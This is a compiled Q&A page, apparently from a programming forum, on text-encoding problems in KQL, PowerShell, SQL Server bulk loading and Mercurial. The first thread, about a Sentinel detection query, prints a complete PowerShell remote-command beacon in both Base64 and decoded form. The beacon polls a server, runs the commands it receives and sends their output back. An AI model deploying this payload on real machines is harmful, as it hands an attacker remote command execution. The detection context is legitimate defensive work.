KQL string function not parsing all characters - kql

I'm having difficulty searching a field for a value in KQL.
The field I am searching is produced by decoding a Base64-encoded string with the built-in function base64_decode_tostring(). The string I am decoding is:
JABzAD0AJwAxADcAMgAuADIAMAAuADEAMAAuADIAOgA4ADAAOAAwACcAOwAkAGkAPQAnADYAOAAwADcAOQBhADAAYgAtADMANgA5ADAAMwAyADEAZAAtADEANgA2ADgAZABjADYAMQAnADsAJABwAD0AJwBoAHQAdABwADoALwAvACcAOwAkAHYAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACAALQBVAHIAaQAgACQAcAAkAHMALwA2ADgAMAA3ADkAYQAwAGIAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAIgBYAC0AOQAyAGQAOQAtAGEAYgA2ADEAIgA9ACQAaQB9ADsAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMwA2ADkAMAAzADIAMQBkACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtADkAMgBkADkALQBhAGIANgAxACIAPQAkAGkAfQApAC4AQwBvAG4AdABlAG4AdAA7AGkAZgAgACgAJABjACAALQBuAGUAIAAnAE4AbwBuAGUAJwApACAAewAkAHIAPQBpAGUAeAAgACQAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAC0ARQByAHIAbwByAFYAYQByAGkAYQBiAGwAZQAgAGUAOwAkAHIAPQBPAHUAdAAtAFMAdAByAGkAbgBnACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHIAOwAkAHQAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABwACQAcwAvADEANgA2ADgAZABjADYAMQAgAC0ATQBlAHQAaABvAGQAIABQAE8AUwBUACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtADkAMgBkADkALQBhAGIANgAxACIAPQAkAGkAfQAgAC0AQgBvAGQAeQAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAZQArACQAcgApACAALQBqAG8AaQBuACAAJwAgACcAKQB9ACAAcwBsAGUAZQBwACAAMAAuADgAfQA=
This string decodes to what I expect in the decodedString column:
$s='172.20.10.2:8080';$i='68079a0b-3690321d-1668dc61';$p='http://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/68079a0b -Headers @{"X-92d9-ab61"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/3690321d -Headers @{"X-92d9-ab61"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/1668dc61 -Method POST -Headers @{"X-92d9-ab61"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}
It can be seen here in the results table:
When I try to use a | where decodedString contains "X-92d9-ab61" clause to detect that value, Sentinel returns no results, even though I can clearly see the string in my decodedString column above.
In fact, the where clause won't match anything unless the search term is a single character that appears in the decodedString column.
Why does it only match single characters? Why will it not match a string longer than one character?

ADX (Azure Data Explorer), also known as Kusto, is the service used as the database for Azure Sentinel.
As the ADX documentation states, "Internally, strings are encoded in UTF-8".
According to the phenomenon you described, and the string you supplied ("AGUAcgBzACAAQAB7ACIAWAAtADkAMgBkADkALQBhAG"), it seems that your original data is in a different encoding, most likely UTF-16LE (each ASCII character is followed by a NUL byte), so after decoding you see your text as characters separated by NUL characters.
Something like this: the stored value is actually "$", NUL, "s", NUL, "=", NUL, and so on, with a NUL character after every visible character. The NULs are invisible when the column is displayed, which is why the text looks correct, but contains "X-92d9-ab61" finds nothing because no multi-character substring occurs contiguously in the stored string; only single-character searches can match.
The recommended solution would be to convert your data to UTF-8 before ingesting it into Azure Sentinel.
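If the source produces UTF-16 text files that are then collected into the workspace, a minimal PowerShell sketch for re-encoding them as UTF-8 first could look like this; the path and file filter are placeholders:
# Re-encode UTF-16 ("Unicode") files as UTF-8 so the ingested strings contain no interleaved NUL bytes
Get-ChildItem -Path 'C:\logs' -Filter '*.log' | ForEach-Object {
    $text = Get-Content -Path $_.FullName -Raw -Encoding Unicode
    Set-Content -Path $_.FullName -Value $text -Encoding UTF8
}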
Update
If the string is constructed only from ASCII characters, we can get a valid, searchable UTF-8 string by removing the NULL characters.
let str = "JABzAD0AJwAxADcAMgAuADIAMAAuADEAMAAuADIAOgA4ADAAOAAwACcAOwAkAGkAPQAnADYAOAAwADcAOQBhADAAYgAtADMANgA5ADAAMwAyADEAZAAtADEANgA2ADgAZABjADYAMQAnADsAJABwAD0AJwBoAHQAdABwADoALwAvACcAOwAkAHYAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACAALQBVAHIAaQAgACQAcAAkAHMALwA2ADgAMAA3ADkAYQAwAGIAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAIgBYAC0AOQAyAGQAOQAtAGEAYgA2ADEAIgA9ACQAaQB9ADsAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMwA2ADkAMAAzADIAMQBkACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtADkAMgBkADkALQBhAGIANgAxACIAPQAkAGkAfQApAC4AQwBvAG4AdABlAG4AdAA7AGkAZgAgACgAJABjACAALQBuAGUAIAAnAE4AbwBuAGUAJwApACAAewAkAHIAPQBpAGUAeAAgACQAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAC0ARQByAHIAbwByAFYAYQByAGkAYQBiAGwAZQAgAGUAOwAkAHIAPQBPAHUAdAAtAFMAdAByAGkAbgBnACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHIAOwAkAHQAPQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABwACQAcwAvADEANgA2ADgAZABjADYAMQAgAC0ATQBlAHQAaABvAGQAIABQAE8AUwBUACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAWAAtADkAMgBkADkALQBhAGIANgAxACIAPQAkAGkAfQAgAC0AQgBvAGQAeQAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAZQArACQAcgApACAALQBqAG8AaQBuACAAJwAgACcAKQB9ACAAcwBsAGUAZQBwACAAMAAuADgAfQA=";
print translate("\0", "", base64_decode_tostring(str))
print_0
$s='172.20.10.2:8080';$i='68079a0b-3690321d-1668dc61';$p='http://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/68079a0b -Headers @{"X-92d9-ab61"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/3690321d -Headers @{"X-92d9-ab61"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/1668dc61 -Method POST -Headers @{"X-92d9-ab61"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}
Fiddle
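The same cleanup can also be applied inline in the detection query itself, for example | where translate("\0", "", decodedString) contains "X-92d9-ab61", so the NUL characters are stripped before the comparison.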

Related

MS Sentinel KQL - Unable to perform string match on decoded base 64 data [duplicate]

Japanese Characters are not recognized when using Invoke-SqlCmd -Query

I'm inserting data from a JSON file into a SQL Server table using Invoke-SqlCmd and a stored procedure, as follows:
Invoke-SqlCmd -ServerInstance $servername -Database $database -Query "EXEC dbo.InsertDataFromJson @JSON='$json'"
The JSON is obtained by reading its raw content:
$json = Get-Content -Path "path\to.json" -Raw
$json # Content:
'{"Id": "2fe2353a-ddd7-479a-aa1a-9c2860680477",
"RecordType": 20,
"CreationTime": "2021-02-14T08:32:23Z",
"Operation": "ViewDashboard",
"UserKey": "10099",
"Workload": "PowerBI",
"UserId": "102273335#gmail.com",
"ItemName": "テスト",
"WorkSpaceName": "My Workspace",
"DashboardName": "テスト",
"ObjectId": "テスト" }'
All the columns with strings, emails and Japanese characters are NVARCHAR(MAX).
The problem is that my JSON contains Japanese characters and they appear as ???? in the table.
When I try to insert a sample using SSMS directly it works fine.
Do you have any idea how to fix this ?
Thank you
Try setting the -Encoding flag to Utf8.
{"test":"みんな"}
Get-Content -Path ".\test.json" -Encoding Utf8
I just found an elegant solution to this mess, if you ever encounter the same problem.
First, I have a stored procedure that takes a parameter. The website that helped is: https://community.idera.com/database-tools/powershell/ask_the_experts/f/sql_server__sharepoint-9/18939/examples-running-sql-stored-procedures-from-powershell-with-output-parameters
Instead of using Invoke-SqlCmd (which is the worst), I used System.Data.SqlClient.SqlCommand as follows:
$connection = New-Object System.Data.SqlClient.SqlConnection
$connection.ConnectionString = "Server={0};Database={1};Integrated Security=True" -f $servername, $database
$connection.Open()
Here I use Integrated Security so I don't need to enter my creds. "dbo.InsertDataFromJson" is my stored procedure.
$Command = New-Object System.Data.SqlClient.SqlCommand("dbo.InsertDataFromJson", $connection)
$Command.CommandType = [System.Data.CommandType]::StoredProcedure   # treat the command text as a stored procedure name
$json = Get-Content -Path .\sample.json -Raw
$Command.Parameters.Add("@JSON", [System.Data.SqlDbType]"NVARCHAR")
$Command.Parameters["@JSON"].Value = $json
$Command.ExecuteScalar()
$connection.Close()
And voilà! My Japanese characters are there, everything is fine and I'm very happy :)

Unable to export Rest API output to CSV via Azure Powershell RunBook

I am trying to export the list of VMs from Azure Update Management using the Azure REST API. Below is my code.
$url = "https://management.azure.com/subscriptions/$($SubscriptionId)/resourceGroups/$($resourceGroup)/providers/Microsoft.Automation/automationAccounts/$($automationAccount)/softwareUpdateConfigurations/$($UpdateScheduleName)?api-version=" + $apiversion
$RestMethod = (Invoke-RestMethod -Uri $url -Headers $headerParams -Method Get)
$NonAzComputerList = ($RestMethod).Properties.updateConfiguration.nonAzureComputerNames
$NonAzComputerList.GetType().FullName
Write-Output $NonAzComputerList
$NonAzComputerList | Export-Csv "VMList.csv" -NoTypeInformation
On the console, I do get the output correctly with the VM names, but in the CSV file I get numbers instead of the VM names.
I tried ConvertFrom-Json as well, but it throws the error "ConvertFrom-Json : Invalid JSON primitive".
GetType() shows System.Object[].
In the console, I am getting the correct VM names:
OurVM01
OurVM022
OurVM0113
OurVM034
In the CSV file, I am getting numbers (equal to the number of characters in each VM name):
List
07
08
09
08
OK, figured it out: used Out-File instead of Export-Csv. Export-Csv serializes the properties of the objects it receives, and a plain string's only property is its Length, which is why the file contained the name lengths rather than the names; Out-File writes the strings themselves.
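For reference, both options; the ComputerName column in the second variant is just an illustration:
# Out-File writes each string as a line of text
$NonAzComputerList | Out-File "VMList.csv"
# Alternatively, wrap each name in an object so Export-Csv has a real column to serialize
$NonAzComputerList | ForEach-Object { [pscustomobject]@{ ComputerName = $_ } } | Export-Csv "VMList.csv" -NoTypeInformation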

BCP update database table based on output from powershell

I have 4 files with the same CSV header, as follows:
Column1,Column2,Column3,Column4
But I only need the data from Column2, Column3 and Column4 to import into the SQL database using BCP. I am using PowerShell to select the columns I want and then import the required data with BCP, but my PowerShell runs with no errors and no data ends up in my database table. How can I get BCP to import the output from PowerShell into the database table? Here is my PowerShell script:
$filePath = Get-ChildItem -Path 'D:\test\*' -Include $filename
$desiredColumn = 'Column2','Column3','Column4'
foreach($file in $filePath)
{
write-host $file
$test = import-csv $file | select $desiredColumn
write-host $test
$action = bcp <myDatabaseTableName> in $test -T -c -t";" -r"\n" -F2 -S <MyDatabase>
}
This is the output from the PowerShell script:
D:\test\sample1.csv
@{column2=111;column3=222;column4=333} @{column2=444;column3=555;column4=666}
D:\test\sample2.csv
@{column2=777;column3=888;column4=999} @{column2=aaa;column3=bbb;column4=ccc}
First off, you can't update a table with bcp. It is used to bulk load data; that is, it will either insert new rows or export existing data into a flat file. Changing existing rows, usually called updating, is out of scope for bcp. If that's what you need, you need another tool. Sqlcmd works fine, and PowerShell has Invoke-Sqlcmd for running arbitrary T-SQL statements.
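For example, a one-off update can be run straight from PowerShell; the table, column names and values here are placeholders:
# Updating existing rows is a job for T-SQL, not bcp
Invoke-Sqlcmd -ServerInstance "<MyDatabase>" -Query "UPDATE dbo.MyTable SET Column3 = 'new value' WHERE Column2 = '111';"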
Anyway, the bcp utility has notoriously tricky syntax. As far as I know, you cannot bulk load data by passing it as a parameter to bcp; a source file must be used. Thus you need to save the filtered data to a file and pass that file's name to bcp.
Exporting a filtered CSV is easy enough; just remember to use the -NoTypeInformation switch, lest you get #TYPE Selected.System.Management.Automation.PSCustomObject as your first row of data. This assumes the bcp arguments are otherwise well and good (why -F2, though? And Unix newlines?).
Stripping the double quotes requires another edit to the file. The Scripting Guy has a solution.
foreach($file in $filePath){
write-host $file
$test = import-csv $file | select $desiredColumn
# Overwrite filtereddata.csv, should one exist, with filtered data
$test | export-csv -path .\filtereddata.csv -NoTypeInformation
# Remove double quotes
(gc filtereddata.csv) | % {$_ -replace '"', ''} | out-file filtereddata.csv -Fo -En ascii
$action = bcp <myDatabaseTableName> in filtereddata.csv -T -c -t";" -r"\n" -F2 -S <MyDatabase>
}
Depending on your locale, the column separator might be a semicolon, a colon or something else. Use the -Delimiter '<character>' switch to pass whatever you need, or change bcp's argument accordingly.
Erland's got a helpful page about bulk operations. Also, see Redgate's advice.
If you'd rather not modify the file first, there is an answer here about how bcp can handle quoted data:
BCP in with quoted fields in source file
Essentially, you need to use the -f option and create a format file to tell SQL Server your custom field delimiter: in short, it is no longer a lone comma (,) but a comma surrounded by double quotes (","). You need to escape the double quotes, and a small trick handles the first double quote on each line. But it works like a charm.
You can also use the format file to ignore columns: just set the destination column number to zero. All with no need to modify the file before the load. Good luck!
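A rough, untested sketch of that approach in PowerShell, assuming the source file looks like "Column1","Column2","Column3","Column4" with every value quoted and the target table has three columns; the format-file version, field lengths, collations and file names below are assumptions to adapt to the real schema:
# Write a non-XML bcp format file: a dummy first field swallows the opening quote,
# "," acts as the field terminator, the closing quote plus CRLF ends the row,
# and a destination column of 0 tells bcp to skip that field (Column1 is not loaded).
@'
12.0
5
1  SQLCHAR  0  8000  "\""      0  FIRST_QUOTE  ""
2  SQLCHAR  0  8000  "\",\""   0  Column1      ""
3  SQLCHAR  0  8000  "\",\""   1  Column2      ""
4  SQLCHAR  0  8000  "\",\""   2  Column3      ""
5  SQLCHAR  0  8000  "\"\r\n"  3  Column4      ""
'@ | Set-Content -Path .\quoted.fmt -Encoding Ascii

# Load the original file as-is; -f replaces -c/-t, and -F2 still skips the header row
bcp <myDatabaseTableName> in D:\test\sample1.csv -f .\quoted.fmt -T -F2 -S <MyDatabase>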

Files with .sql extension identified as binary in Mercurial [duplicate]

Possible Duplicate:
Why does Mercurial think my SQL files are binary?
I generated a complete set of scripts for the stored procedures in a database. When I created a Mercurial repository and added these files, they were all added as binary. Obviously, I still get the benefits of versioning, but lose a lot of the efficiency, diffing, etc. of text files. I verified that these files are indeed all just text.
Why is it doing this?
What can I do to avoid it?
Is there a way to get Hg to change its mind about these files?
Here is a snippet of changeset log:
496.1 Binary file SQL/SfiData/Stored Procedures/dbo.pFindCustomerByMatchCode.StoredProcedure.sql has changed
497.1 Binary file SQL/SfiData/Stored Procedures/dbo.pFindUnreconcilableChecks.StoredProcedure.sql has changed
498.1 Binary file SQL/SfiData/Stored Procedures/dbo.pFixBadLabelSelected.StoredProcedure.sql has changed
499.1 Binary file SQL/SfiData/Stored Procedures/dbo.pFixCCOPL.StoredProcedure.sql has changed
500.1 Binary file SQL/SfiData/Stored Procedures/dbo.pFixCCOrderMoneyError.StoredProcedure.sql has changed
Thanks in advance for your help
Jim
In keeping with Mercurial's views on binary files, it does not actually track file types, which means there is no way for a user to mark a file as binary or not.
As tonfa and Rudi mentioned, Mercurial determines whether a file is binary or not by seeing if there is a NUL byte anywhere in the file. In the case of UTF-[16|32] files, a NUL byte is pretty much guaranteed.
To "fix" this, you would have to ensure that the files are encoded with UTF-8 instead of UTF-16. Ideally, your database would have a setting for Unicode encoding when doing the export. If that's not the case, another option would be to write a precommit hook to do it (see How to convert a file to UTF-8 in Python for a start), but you would have to be very careful about which files you were converting.
I know it's a bit late, but I was evaluating Kiln and came across this problem. After discussion with the guys at Fogbugz who couldn't give me an answer other than "File/Save As" from SSMS for every *.sql file (very tedious), I decided to have a look at writing a quick script to convert the *.sql files.
Fortunately, you can use one Microsoft technology (PowerShell) to (sort of) overcome an issue with another Microsoft technology (SSMS). Using PowerShell, change to the directory that contains your *.sql files, then copy and paste the following into the PowerShell shell (or save it as a .ps1 script and run it from PowerShell; make sure to run "Set-ExecutionPolicy RemoteSigned" before trying to run a .ps1 script):
function Get-FileEncoding
{
[CmdletBinding()] Param (
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] [string]$Path
)
[byte[]]$byte = get-content -Encoding byte -ReadCount 4 -TotalCount 4 -Path $Path
if ( $byte[0] -eq 0xef -and $byte[1] -eq 0xbb -and $byte[2] -eq 0xbf )
{ Write-Output 'UTF8' }
elseif ($byte[0] -eq 0xfe -and $byte[1] -eq 0xff)
{ Write-Output 'Unicode' }
elseif ($byte[0] -eq 0xff -and $byte[1] -eq 0xfe)
{ Write-Output 'Unicode' }
elseif ($byte[0] -eq 0 -and $byte[1] -eq 0 -and $byte[2] -eq 0xfe -and $byte[3] -eq 0xff)
{ Write-Output 'UTF32' }
elseif ($byte[0] -eq 0x2b -and $byte[1] -eq 0x2f -and $byte[2] -eq 0x76)
{ Write-Output 'UTF7'}
else
{ Write-Output 'ASCII' }
}
$files = get-ChildItem "*.sql"
foreach ( $file in $files )
{
$encoding = Get-FileEncoding $file
If ($encoding -eq 'Unicode')
{
(Get-Content "$file" -Encoding Unicode) | Set-Content -Encoding UTF8 "$file"
}
}
The function Get-FileEncoding is courtesy of http://poshcode.org/3227, although I had to modify it slightly to cater for UCS-2 little-endian files, which SSMS seems to have saved these as. I would recommend backing up your files first, as it overwrites the originals. You could, of course, modify the script so that it saves a UTF-8 version of the file instead, e.g. change the last line of code to:
(Get-Content "$file" -Encoding Unicode) | Set-Content -Encoding UTF8 "$file.new"
The script should be easy to modify to traverse subdirectories as well.
Now you just need to remember to run this if there are any new *.sql files, before you commit and push your changes. Any files already converted and subsequently opened in SSMS will stay as UTF-8 when saved.